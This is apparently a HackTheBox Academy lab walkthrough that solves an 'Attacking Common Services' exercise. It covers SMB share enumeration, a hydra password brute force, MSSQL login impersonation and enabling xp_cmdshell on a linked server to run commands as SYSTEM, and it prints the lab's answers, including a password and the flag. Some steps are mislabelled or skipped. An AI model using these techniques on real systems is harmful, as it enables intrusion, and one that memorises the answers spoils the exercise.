Attacking Common Services - Hard
โน๏ธ Informations¶
- ๐ Website: HackTheBox
- ๐ Module: Attacking Common Services
- ๐ Link: Attacking Common Services - Hard
โQuestion¶
What file can you retrieve that belongs to the user "simon"? (Format: filename.txt)
๐ Walkthrough¶
Full port scan
โโโ(kaliใฟkali)-[~/Desktop/HTB/Academy]
โโ$ nmap -p- --min-rate=10000 $target
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 21:08 UTC
Nmap scan report for inlanefreight.htb (10.129.203.10)
Host is up (0.027s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds
It's a Windows Server. Let's check the ports with a scan script to gather more information about the services running on these ports.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 21:09 UTC
Nmap scan report for inlanefreight.htb (10.129.203.10)
Host is up (0.026s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.203.10:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack lev: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2025-03-20T20:09:44+00:00; -1h00m05s from scanner time.
| ms-sql-ntlm-info:
| 10.129.203.10:1433:
| Target_Name: WIN-HARD
| NetBIOS_Domain_Name: WIN-HARD
| NetBIOS_Computer_Name: WIN-HARD
| DNS_Domain_Name: WIN-HARD
| DNS_Computer_Name: WIN-HARD
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-03-20T20:04:21
|_Not valid after: 2055-03-20T20:04:21
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WIN-HARD
| NetBIOS_Domain_Name: WIN-HARD
| NetBIOS_Computer_Name: WIN-HARD
| DNS_Domain_Name: WIN-HARD
| DNS_Computer_Name: WIN-HARD
| Product_Version: 10.0.17763
|_ System_Time: 2025-03-20T20:09:04+00:00
| ssl-cert: Subject: commonName=WIN-HARD
| Not valid before: 2025-03-19T20:04:10
|_Not valid after: 2025-09-18T20:04:10
|_ssl-date: 2025-03-20T20:09:44+00:00; -1h00m05s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-03-20T20:09:06
|_ start_date: N/A
|_clock-skew: mean: -1h00m05s, deviation: 0s, median: -1h00m05s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.11 seconds
โโโ(kaliใฟkali)-[~/Desktop/HTB/Academy]
โโ$ smbclient -N -L //$target
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Home Disk
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.203.10 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
โโโ(kaliใฟkali)-[~/Desktop/HTB/Academy]
โโ$ smbclient -N //$target/Home
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Apr 21 21:18:21 2022
.. D 0 Thu Apr 21 21:18:21 2022
HR D 0 Thu Apr 21 20:04:39 2022
IT D 0 Thu Apr 21 20:11:44 2022
OPS D 0 Thu Apr 21 20:05:10 2022
Projects D 0 Thu Apr 21 20:04:48 2022
7706623 blocks of size 4096. 3143820 blocks available
smb: \>
Home share. Let's download all files from this share to our local machine. In Simon's folder, there's a file named random.txt. Answer
random.txt
โQuestion¶
Enumerate the target and find a password for the user Fiona. What is her password?
๐ Walkthrough¶
After downloading the files from the SMB share, we have the following directory structure:
โโ$ tree
.
โโโ Fiona
โย ย โโโ creds.txt
โโโ John
โย ย โโโ information.txt
โย ย โโโ notes.txt
โย ย โโโ secrets.txt
โโโ Simon
โโโ random.txt
Let's try to brute-force the MSSQL server with the user fiona using the credentials found in the creds.txt file.
โโโ(kaliใฟkali)-[~/Desktop/HTB/Academy]
โโ$ hydra -l fiona -P creds.txt rdp://$target
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-20 21:30:37
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 15 login tries (l:1/p:15), ~4 tries per task
[DATA] attacking rdp://10.129.203.10:3389/
[3389][rdp] account on 10.129.203.10 might be valid but account not active for remote desktop: login: fiona password: 48Ns72!bns74@S84NNNSl, continuing attacking the account.
[ERROR] freerdp: The connection failed to establish.
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-20 21:30:41
Let's try the credentials fiona:48Ns72!bns74@S84NNNSl on the MSSQL server. It works!
โโโ(kaliใฟkali)-[~/Desktop/HTB/Academy]
โโ$ impacket-mssqlclient fiona@$target -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WIN-HARD\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(WIN-HARD\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (WIN-HARD\Fiona guest@master)>
Answer
48Ns72!bns74@S84NNNSl
โQuestion¶
Once logged in, what other user can we compromise to gain admin privileges?
๐ Walkthrough¶
After logging in as Fiona, let's enumerate the databases on the MSSQL server.
SQL (WIN-HARD\Fiona guest@master)> SELECT name FROM master.dbo.sysdatabases
name
---------
master
tempdb
model
msdb
TestingDB
TestAppDB
Let's switch to the TestingDB database and enumerate the tables.
INFO(WIN-HARD\SQLEXPRESS): Line 1: Changed database context to 'TestingDB'.
SQL (WIN-HARD\Fiona WIN-HARD\Fiona@TestingDB)> SELECT * FROM TestingDB.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
SQL (WIN-HARD\Fiona WIN-HARD\Fiona@TestingDB)>
SQL (WIN-HARD\Fiona guest@msdb)> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
name
-----
john
simon
We found that the users john and simon have impersonation privileges. Let's switch to the user john and check his privileges.
SQL (john guest@master)> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
name
----
john
SQL (john guest@master)> SELECT SYSTEM_USER
----
john
SQL (john guest@master)> SELECT IS_SRVROLEMEMBER('sysadmin')
-
0
John does not have sysadmin privileges directly, but we can use the linked server to escalate our privileges.
SQL (john guest@master)> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]
- - - -
1 1 1 1
Answer
john
โQuestion¶
Submit the contents of the flag.txt file on the Administrator Desktop.
๐ Walkthrough¶
In the file information.txt we see a note:
SQL (john guest@master)> SELECT srvname, isremote FROM sysservers
srvname isremote
--------------------- --------
WINSRV02\SQLEXPRESS 1
LOCAL.TEST.LINKED.SRV 0
SQL (john guest@master)>
LOCAL.TEST.LINKED.SRV. Now, let's enable advanced options and xp_cmdshell on this linked server to execute system commands. SQL (john guest@master)> EXEC ('sp_configure ''show advanced options'', 1') AT [LOCAL.TEST.LINKED.SRV]
INFO(WIN-HARD\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (john guest@master)> EXEC ('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV]
SQL (john guest@master)> EXEC ('sp_configure ''xp_cmdshell'',1') AT [LOCAL.TEST.LINKED.SRV]
INFO(WIN-HARD\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (john guest@master)> EXEC ('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV]
SQL (john guest@master)>
xp_cmdshell to execute system commands. Let's check the current user context. SQL (john guest@master)> EXEC ('xp_cmdshell ''whoami''') AT [LOCAL.TEST.LINKED.SRV]
output
-------------------
nt authority\system
NULL
nt authority\system, which has administrative privileges. Now, let's read the contents of the flag.txt file on the Administrator's Desktop. SQL (john guest@master)> EXEC ('xp_cmdshell ''type C:\Users\Administrator\Desktop\flag.txt''') AT [LOCAL.TEST.LINKED.SRV]
output
---------------------------
HTB{46u$!n9_l!nk3d_$3rv3r$}
Answer
HTB{46u$!n9_l!nk3d_$3rv3r$}